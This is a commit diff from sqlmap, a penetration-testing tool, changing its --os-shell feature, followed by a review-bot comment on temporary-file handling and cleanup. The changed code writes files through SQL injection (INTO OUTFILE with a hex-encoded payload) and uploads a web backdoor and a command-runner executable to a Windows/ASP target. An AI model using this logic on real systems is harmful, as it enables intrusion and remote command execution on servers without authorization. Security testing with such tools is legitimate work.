more updates regarding --os-shell feature

Miroslav Stampar 2010-02-25 12:16:49 +00:00
parent b558712a47
commit 24d3e24db0
2 changed files with 16 additions and 17 deletions


@ -111,7 +111,7 @@ class Web:
def __webFileInject(self, fileContent, fileName, directory): def __webFileInject(self, fileContent, fileName, directory):
outFile = posixpath.normpath("%s/%s" % (directory, fileName)) outFile = posixpath.normpath("%s/%s" % (directory, fileName))
uplQuery = fileContent.replace("WRITABLE_DIR", directory.replace('/', '\\\\') if kb.os == "Windows" else directory) uplQuery = fileContent.replace("WRITABLE_DIR", directory.replace('/', '\\') if kb.os == "Windows" else directory)
query = " LIMIT 1 INTO OUTFILE '%s' " % outFile query = " LIMIT 1 INTO OUTFILE '%s' " % outFile
query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery) query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
query = agent.prefixQuery(" %s" % query) query = agent.prefixQuery(" %s" % query)
@ -200,12 +200,13 @@ class Web:
logger.info(infoMsg) logger.info(infoMsg)
if self.webApi == "asp": if self.webApi == "asp":
scriptsDirectory = "Scripts"
runcmdName = "tmpe%s.exe" % randomStr(4) runcmdName = "tmpe%s.exe" % randomStr(4)
runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName) runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName)
backdoorUploaded = False match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)
for backdoorDirectoryFormat in ("%s.\%s", "%s..\%s", "%s..\..\%s"): if match:
backdoorDirectory = backdoorDirectoryFormat % (posixToNtSlashes(directory), scriptsDirectory) backdoorDirectory = match.group(1)
else:
continue
backdoorContent = originalBackdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName) backdoorContent = originalBackdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName)
backdoorStream.file.truncate() backdoorStream.file.truncate()
backdoorStream.read() backdoorStream.read()
@ -213,11 +214,9 @@ class Web:
backdoorStream.write(backdoorContent) backdoorStream.write(backdoorContent)
if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory): if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory) self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
self.webBackdoorUrl = "%s/%s/%s" % (self.webBaseUrl.rstrip('/'), scriptsDirectory, backdoorName) self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl.rstrip('/'), backdoorName)
self.webDirectory = backdoorDirectory self.webDirectory = backdoorDirectory
backdoorUploaded = True else:
break
if not backdoorUploaded:
continue continue
elif not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory): elif not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory):
warnMsg = "backdoor hasn't been successfully uploaded " warnMsg = "backdoor hasn't been successfully uploaded "
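Review bot: In the `asp` branch of the second hunk, `runcmdStream` is created by `decloakToNamedTemporaryFile(...)` before the `scriptsdir` match is tested, so the new `else: continue` path abandons that stream on every pass where the hidden field is absent. Assuming the helper returns an open named temporary file, running the `re.search` first and decloaking `runcmd.exe_` only inside `if match:` would avoid leaving stray temporary files on the tester's machine. In the third hunk the return value of the second `__webFileStreamUpload(runcmdStream, ...)` call is still ignored, so `self.webBackdoorUrl` and `self.webDirectory` are set even if only one of the two files was written; the recorded state can then disagree with what was actually placed on the target, which makes post-engagement cleanup harder to account for. The URL also hard-codes `/Scripts/` while the upload directory now comes from the page's `scriptsdir` value, so a comment such as `# assumes the reported scriptsdir is the directory served as /Scripts` would document that coupling. The enclosing loop and method begin outside these hunks.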

Binary file not shown.